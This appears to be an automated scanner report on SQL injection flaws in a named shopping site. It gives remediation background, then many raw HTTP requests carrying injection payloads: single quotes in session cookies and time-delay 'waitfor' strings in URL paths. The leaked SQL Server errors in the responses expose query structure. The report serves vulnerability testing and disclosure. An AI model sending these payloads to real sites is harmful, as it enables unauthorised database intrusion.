SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /Interact/ HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:30 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:30 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /Interact/ HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:44 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:44 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /default.asp HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467; AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328
Response (redirected)
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:00 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:00 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /default.asp HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467'; AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328
Response (redirected)
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:56 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:56 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /favicon.ico HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467; AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:12 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:12 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /favicon.ico HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467'; AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:09 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:08 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /favicon.ico',0,0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467; AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:24:59 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 313 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:24:58 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near '174.121'.</font> < ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/AYGsearch.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:15:08 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:15:08 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/AYGsearch.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:17:48 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:17:48 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/GiftGuide.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:39 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:38 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/GiftGuide.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:49 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:48 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/addto_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:43 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:44 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/addto_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:56 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:56 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/addto_cart.asp',0,0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:22:08 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 313 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:22:08 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near '174.121'.</font> < ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/atoz__aa.html HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:19 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:20 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/atoz__aa.html HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:35 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:34 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/catalog.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:10 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:10 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
